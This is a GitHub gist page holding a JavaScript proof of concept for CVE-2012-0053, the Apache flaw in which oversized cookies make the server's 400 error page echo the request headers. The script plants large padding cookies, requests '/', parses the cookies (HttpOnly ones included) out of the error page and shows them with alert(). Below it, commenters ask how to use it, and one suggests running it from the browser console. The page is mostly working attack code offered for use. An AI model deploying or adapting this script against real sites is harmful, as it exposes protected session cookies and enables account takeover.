Skip to content

Instantly share code, notes, and snippets.

@pilate
Created Jan 31, 2012
Embed
What would you like to do?
Script to take advantage of CVE-2012-0053
// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
@cclcc
Copy link

cclcc commented Feb 15, 2012

how to use it??

@SlottoCorleone
Copy link

SlottoCorleone commented May 11, 2013

How can we use it ? Would you mind giving me an example ?

@iliaselmatani
Copy link

iliaselmatani commented Apr 25, 2014

It's written in JavaScript. So the most easy way will be but the code in your command editor which can be found in the console (e.g. firebug console or 'element inspector') and RUN!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment